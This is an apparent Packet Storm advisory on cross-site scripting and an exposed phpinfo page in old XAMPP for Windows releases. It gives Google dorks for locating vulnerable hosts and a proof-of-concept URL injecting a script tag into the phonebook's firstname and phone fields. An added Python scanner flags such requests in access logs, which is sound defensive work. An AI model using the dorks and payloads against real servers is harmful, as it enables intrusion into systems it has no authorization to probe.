XAMPP For Windows Cross Site Scripting

2009-06-30T00:00:00
ID PACKETSTORM:78764
Type packetstorm
Reporter Cru3l.b0y
Modified 2009-06-30T00:00:00

Description

                                        
`# XAMPP for Windows (Xss/PHPinfo) Multiple Vulnerability  
# AUTHOR : Cru3l.b0y  
# DATE : 05 APR 2009  
# SITE : WwW.DeltaHacking.Net  
# CONTACT : Cru3l.b0y@deltahacking.net  
  
#####################################################  
  
# APPLICATION : XAMPP for Windows  
# VERSION : 1.4.9 , 1.5.0 , 1.5.1 , 1.6.4  
# DOWNLOAD : http://www.apachefriends.org/en/xampp-windows.html  
# VENDOR : http://www.apachefriends.org/  
  
#####################################################  
  
[+] Xss:  
  
Dork : inurl:"/xampp/phonebook.php"  
Exploit :   
The vulnerability is in the phonebook page. First go to site.com/xampp/phonebook.php,  
then enter your script in the First name or Phone number box and press ADD. The script will then run.  
  
http://127.0.0.1/xampp/phonebook.php?lastname=Cru3l.b0y&firstname=<script>alert(123);</script>&phone=<script>alert(123);</script>  
  
  
[+] PHPinfo:  
  
Dork : inurl:"/xampp/phpinfo.php"  
Exploit : http://127.0.0.1/xampp/phpinfo.php  
###############################################################################################  
# Greeting: Dr.Trojan, Sasha, b3hz4d, PLATEN, black.viper and all members of DeltaHacking.Net #  
###############################################################################################`
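
For defenders running an affected install, the sketch below scans Apache access-log lines for the two conditions the advisory describes: markup submitted in the phonebook's firstname or phone parameters, and phpinfo.php requested by a non-local client. It is an added example, not part of the original advisory or of XAMPP; the log format (Apache common/combined), the regular expressions and the sample lines are assumptions constructed for illustration, and submissions sent in a POST body will not appear in an access log.

```python
import re
from urllib.parse import parse_qs, unquote

# Assumed Apache common/combined log prefix: client, identity, user, [time], "METHOD target ..."
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (\S+)[^"]*"')
# Characters and patterns that have no place in a name or phone number.
MARKUP_RE = re.compile(r'[<>]|\bon\w+\s*=', re.I)
LOOPBACK = {"127.0.0.1", "::1"}
FIELDS = ("firstname", "phone")  # the two inputs named in the advisory


def classify(line):
    """Return a list of findings for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    client, target = m.groups()
    raw_path, _, query = target.partition("?")
    # Decode %xx escapes and lower-case: Windows paths are case-insensitive.
    path = unquote(raw_path).lower()
    findings = []
    if path.endswith("/xampp/phonebook.php"):
        params = parse_qs(query, keep_blank_values=True)  # URL-decodes values
        for field in FIELDS:
            if any(MARKUP_RE.search(v) for v in params.get(field, [])):
                findings.append(f"markup in phonebook field '{field}' from {client}")
    elif path.endswith("/xampp/phpinfo.php") and client not in LOOPBACK:
        findings.append(f"phpinfo.php requested by non-local client {client}")
    return findings


def scan(lines):
    """Collect findings across many log lines."""
    return [f for line in lines for f in classify(line)]


# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Jun/2009:10:00:01 +0000] "GET /xampp/phonebook.php?lastname=a'
    '&firstname=%3Cscript%3Ealert(123)%3B%3C/script%3E&phone=1 HTTP/1.1" 200 512',
    '127.0.0.1 - - [30/Jun/2009:10:00:02 +0000] "GET /xampp/phpinfo.php HTTP/1.1" 200 40960',
    '198.51.100.9 - - [30/Jun/2009:10:00:03 +0000] "GET /xampp/phpinfo.php HTTP/1.1" 200 40960',
    '192.0.2.10 - - [30/Jun/2009:10:00:04 +0000] "GET /xampp/phonebook.php?lastname=Doe'
    '&firstname=Jane&phone=555-0100 HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any finding on a production host is also a sign that the /xampp/ demo directory is reachable from outside and should be removed or restricted to local access.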